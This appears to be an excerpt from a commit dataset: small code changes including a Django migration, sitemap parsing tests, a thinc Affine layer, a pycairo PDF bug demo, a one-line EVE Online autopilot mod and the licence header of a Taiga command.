name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
<commit_before><commit_msg>Add migration for Target samplesize<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
Add migration for Target samplesize# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
<commit_before><commit_msg>Add migration for Target samplesize<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
|
a803b54a588e5e96b7c1fd4877117dabd0facdf9
|
mediacloud/mediawords/util/sitemap/test_helpers.py
|
mediacloud/mediawords/util/sitemap/test_helpers.py
|
import datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
    assert html_unescape_ignore_none("test &amp; test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
Add some tests for sitemap parsing helpers
|
Add some tests for sitemap parsing helpers
|
Python
|
agpl-3.0
|
berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud
|
Add some tests for sitemap parsing helpers
|
import datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
    assert html_unescape_ignore_none("test &amp; test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
<commit_before><commit_msg>Add some tests for sitemap parsing helpers<commit_after>
|
import datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
    assert html_unescape_ignore_none("test &amp; test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
Add some tests for sitemap parsing helpersimport datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
    assert html_unescape_ignore_none("test &amp; test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
<commit_before><commit_msg>Add some tests for sitemap parsing helpers<commit_after>import datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
    assert html_unescape_ignore_none("test &amp; test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
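A hedged reconstruction of the two helpers, inferred from the assertions alone (the real versions live in mediawords.util.sitemap.helpers); dateutil's isoparse accepts every W3C datetime variant exercised above, including the two-digit fractional seconds that datetime.fromisoformat rejects on older Pythons:

import html

from dateutil.parser import isoparse

def html_unescape_ignore_none(string):
    # Like html.unescape(), but passes None through untouched.
    return html.unescape(string) if string is not None else None

def parse_sitemap_publication_date(date_string):
    # Sitemaps use the W3C datetime profile of ISO 8601.
    return isoparse(date_string)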
|
cfb17cb9f7c72908b5bc915d8f0e2e465358c45f
|
thinc/neural/affine.py
|
thinc/neural/affine.py
|
from .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
Move Affine to its own module
|
Move Affine to its own module
|
Python
|
mit
|
spacy-io/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc
|
Move Affine to its own module
|
from .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
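To make the gradient bookkeeping in finish_update concrete, a small standalone numpy check of the shapes involved (assuming ops.batch_outer and ops.batch_dot implement the usual summed outer-product and matrix-product semantics):

import numpy as np

B, I, O = 4, 3, 2                    # batch size, nr_in, nr_out
acts_BI = np.random.randn(B, I)
d_acts_BO = np.random.randn(B, O)
W = np.random.randn(O, I)

d_b = d_acts_BO.sum(axis=0)          # (O,)   bias gradient
d_W = d_acts_BO.T.dot(acts_BI)       # (O, I) outer products summed over the batch
d_inputs = d_acts_BO.dot(W)          # (B, I) gradient passed back to the inputs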
<commit_before><commit_msg>Move Affine to its own module<commit_after>
|
from .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
Move Affine to its own modulefrom .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
<commit_before><commit_msg>Move Affine to its own module<commit_after>from .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
|
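The layer above is a standard fully connected (affine) transform: the forward pass computes output = input · Wᵀ + b, and the backward pass accumulates d_b as the column sum of the output gradient, d_W as the batched outer product with the input, and hands d_input = d_output · W to the previous layer. A minimal NumPy sketch of the same forward/backward math, independent of thinc's Model and ops machinery (all names here are illustrative, not thinc's API):

import numpy as np

def affine_forward(W, b, X):
    # X: (batch, nr_in), W: (nr_out, nr_in), b: (nr_out,)
    return X @ W.T + b

def affine_backward(W, X, dY):
    # dY: (batch, nr_out) -- mirrors the sum/batch_outer/batch_dot calls above
    d_b = dY.sum(axis=0)   # bias gradient
    d_W = dY.T @ X         # weight gradient (summed outer products)
    d_X = dY @ W           # gradient handed to the previous layer
    return d_W, d_b, d_X

rng = np.random.default_rng(0)
W, b = rng.normal(size=(3, 4)), np.zeros(3)
X, dY = rng.normal(size=(5, 4)), rng.normal(size=(5, 3))
Y = affine_forward(W, b, X)
d_W, d_b, d_X = affine_backward(W, X, dY)
assert Y.shape == (5, 3) and d_W.shape == W.shape and d_X.shape == X.shape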
2311673478616bf16b4411772511e301e82b9860
|
misc/cairo-group-pdf-bug.py
|
misc/cairo-group-pdf-bug.py
|
import cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
Add python program to illustrate strange cairo bug with group and pdf
|
Add python program to illustrate strange cairo bug with group and pdf
|
Python
|
lgpl-2.1
|
openslide/openslide,openslide/openslide,openslide/openslide,openslide/openslide
|
Add python program to illustrate strange cairo bug with group and pdf
|
import cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
<commit_before><commit_msg>Add python program to illustrate strange cairo bug with group and pdf<commit_after>
|
import cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
Add python program to illustrate strange cairo bug with group and pdfimport cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
<commit_before><commit_msg>Add python program to illustrate strange cairo bug with group and pdf<commit_after>import cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
|
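The script above drives cairo's group mechanism: push_group redirects all drawing onto a temporary surface, and pop_group_to_source turns that surface into the current source so a single paint composites the whole group — the combination the script exercises together with OPERATOR_SATURATE on a PDF target. A minimal pycairo sketch of the same push/pop/paint pattern against a PNG surface (the file name is illustrative):

import cairo

surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 200, 200)
cr = cairo.Context(surface)
cr.set_source_rgb(0, 0, 1)      # blue background
cr.paint()
cr.push_group()                 # drawing now targets a temporary surface
cr.set_source_rgb(1, 0, 0)
cr.rectangle(50, 50, 100, 100)
cr.fill()
cr.pop_group_to_source()        # the finished group becomes the source
cr.paint()                      # composite it in one operation
surface.write_to_png("group-demo.png")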
08362c2f45f749f1942d3317ce8b64f64abca23f
|
mods/Autopilot0/__init__.py
|
mods/Autopilot0/__init__.py
|
import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
Add mod: Autopilot to 0
|
Add mod: Autopilot to 0
|
Python
|
mit
|
EVEModX/Mods
|
Add mod: Autopilot to 0
|
import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
<commit_before><commit_msg>Add mod: Autopilot to 0<commit_after>
|
import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
Add mod: Autopilot to 0import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
<commit_before><commit_msg>Add mod: Autopilot to 0<commit_after>import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
|
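The one-line mod works because Python lets you attach new callables to an existing class at runtime (monkey-patching); the lambda's first parameter s receives the instance, so it behaves like a bound method and can delegate to the original CmdWarpToStuff. A self-contained sketch of the pattern with a stand-in class (Moniker below is a dummy, not EVE's util.Moniker):

class Moniker(object):
    def CmdWarpToStuff(self, what, item_id, minRange=0):
        return 'warp to %s %s at range %s' % (what, item_id, minRange)

# Attach a new method after the fact; s becomes self at call time.
Moniker.CmdWarpToStuffAutopilot = lambda s, x: s.CmdWarpToStuff('item', x, minRange=0)

m = Moniker()
print(m.CmdWarpToStuffAutopilot(42))   # -> warp to item 42 at range 0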
17462a888a8ea5c2f7fdfa25cdb0ae07054c0753
|
taiga/projects/management/commands/change_project_slug.py
|
taiga/projects/management/commands/change_project_slug.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
